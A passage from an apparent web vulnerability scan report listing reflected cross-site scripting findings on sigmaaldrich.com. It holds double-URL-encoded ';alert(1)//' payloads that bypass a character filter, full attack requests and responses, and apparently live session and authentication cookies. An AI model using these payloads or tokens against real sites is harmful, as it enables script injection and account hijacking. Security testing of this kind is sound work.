Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 29001
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/analytical-chromatography/fluka-analytical/customware-oem12939";alert(1)//16e13dff68c","E404") ;
   </script>
...[SNIP]...

1.88. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9 was submitted in the REST URL parameter 1. This input was echoed as 54859";alert(1)//f7b186b0cc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content54859%2522%253balert%25281%2529%252f%252ff7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content54859";alert(1)//f7b186b0cc9/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.89. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b749e%2522%253balert%25281%2529%252f%252f222bd087545 was submitted in the REST URL parameter 2. This input was echoed as b749e";alert(1)//222bd087545 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb749e%2522%253balert%25281%2529%252f%252f222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:06 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb749e";alert(1)//222bd087545/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.90. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff was submitted in the REST URL parameter 3. This input was echoed as 79af7";alert(1)//5a3e73ff3ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest79af7%2522%253balert%25281%2529%252f%252f5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest79af7";alert(1)//5a3e73ff3ff/chemistry/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.91. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0 was submitted in the REST URL parameter 4. This input was echoed as 458ee";alert(1)//b83b48b40d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry458ee%2522%253balert%25281%2529%252f%252fb83b48b40d0/chemical-synthesis/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry458ee";alert(1)//b83b48b40d0/chemical-synthesis/chemical-synthesis-catalog","E404") ;
   </script>
...[SNIP]...

1.92. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis/chemical-synthesis-catalog

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228fc%2522%253balert%25281%2529%252f%252f2869de04022 was submitted in the REST URL parameter 5. This input was echoed as 228fc";alert(1)//2869de04022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/chemical-synthesis228fc%2522%253balert%25281%2529%252f%252f2869de04022/chemical-synthesis-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
